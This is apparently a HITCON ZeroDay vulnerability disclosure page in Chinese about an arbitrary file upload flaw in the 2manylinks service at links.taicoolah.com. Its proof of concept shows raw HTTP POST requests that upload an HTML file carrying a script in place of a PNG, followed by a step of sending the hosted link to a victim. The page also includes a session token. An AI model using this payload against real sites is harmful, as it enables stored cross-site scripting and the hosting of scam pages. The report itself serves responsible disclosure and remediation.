Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2025-01059
- 發信 Vendor: 台酷拉
- Title: 2manylinks Arbitrary File Upload
- Introduction: 使用者可以上傳任意檔案
處理狀態
目前狀態
公開
Last Update : 2025/10/25
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2025/08/25 15:06:30 : 新提交 (由 Tobydog 更新此狀態)
- 2025/08/29 14:24:12 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/09/02 11:22:55 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/09/02 11:22:55 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/09/02 11:22:55 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/10/25 03:00:06 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2025-01059
- 通報者:tobydog0501 (Tobydog)
- 風險:中
- 類型:任意檔案上傳 (Arbitrary File Upload)
參考資料
攻擊者可上傳任意檔案至該主機,有機會經由上傳之文件取得該主機系統權限。
漏洞說明: OWASP - Unrestricted File Upload
https://www.owasp.org/index.php/Unrestricted_File_Upload
漏洞說明: CWE-434: Unrestricted Upload of File with Dangerous Type
https://cwe.mitre.org/data/definitions/434.html
漏洞說明: OWASP - Unrestricted File Upload
https://www.owasp.org/index.php/Unrestricted_File_Upload
漏洞說明: CWE-434: Unrestricted Upload of File with Dangerous Type
https://cwe.mitre.org/data/definitions/434.html
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
https://pub-132691a0602b443190b9962cba510400.r2.dev
https://links.taicoolah.com/
https://links.taicoolah.com/
敘述
描述
使用者可以繞過上傳限制(png/jpg/gif),並上傳任意檔案
重現步驟
- 以攻擊者帳號登入
- 編輯自己的頁面並嘗試上傳合法的圖片
- 攔截此請求
- 編輯此request,如修改content-type為text/html來做XSS,也可修改user id來製造他人上傳的假象
POST /manage/settings HTTP/2
Host: links.taicoolah.com
Cookie: session=eyJhbGciOiJIUzI1NiJ9.eyJlbWFpbCI6ImRldkB0b2J5ZG9nLm9yZyIsInVzZXJJZCI6IkN5U1B1SGZiZHhaRE8ySVFjdElGaDUxckFEV216RWtuQk0yUSIsIm5hbWUiOiJUb2J5IHRlc3QiLCJpYXQiOjE3NTYxMDAyMjAsImV4cCI6MTc1NjcwNTAyMH0.ztKQsMq_wh7b8VXpCphUhpgl-8vTf74RhWPqu3ID85A
OTHER HEADERS ARE SKIPPED
-----------------------------349046767215454167693825827731
Content-Disposition: form-data; name="1"; filename="temp.png"
Content-Type: image/png
-----------------------------349046767215454167693825827731
Content-Disposition: form-data; name="0"
["CySPuHfbdxZDO2IQctIFh51rADWmzEknBM2Q",["$B1"],false]
-----------------------------349046767215454167693825827731--POC
以攻擊者(Toby Test)登入
上傳檔案並修改為下列
POST /manage/settings HTTP/2
Host: links.taicoolah.com
Cookie: session=eyJhbGciOiJIUzI1NiJ9.eyJlbWFpbCI6ImRldkB0b2J5ZG9nLm9yZyIsInVzZXJJZCI6IkN5U1B1SGZiZHhaRE8ySVFjdElGaDUxckFEV216RWtuQk0yUSIsIm5hbWUiOiJUb2J5IHRlc3QiLCJpYXQiOjE3NTYxMDAyMjAsImV4cCI6MTc1NjcwNTAyMH0.ztKQsMq_wh7b8VXpCphUhpgl-8vTf74RhWPqu3ID85A
OTHER HEADERS ARE SKIPPED
-----------------------------349046767215454167693825827731
Content-Disposition: form-data; name="1"; filename="temp.html"
Content-Type: text/html
<script>alert();</script>
-----------------------------349046767215454167693825827731
Content-Disposition: form-data; name="0"
["CySPuHfbdxZDO2IQctIFh51rADWmzEknBM2Q",["$B1"],false]
-----------------------------349046767215454167693825827731--此時回傳此連結:
https://pub-132691a0602b443190b9962cba510400.r2.dev/items/CySPuHfbdxZDO2IQctIFh51rADWmzEknBM2Q/k7n2s7j7ktfpvbw4.html
將此連結送給受害者
點開後就是該html檔案,並且會執行JS
風險
暫時沒有過大的風險,因為使用者頁面不會執行任何script,但有可能會被拿來製作其他scam website等隱患
https://www.first.org/cvss/calculator/3-1#CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:N
修補建議
上傳檔案時,**後端**檢查檔案副檔名、MIME Type、以及file signature
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。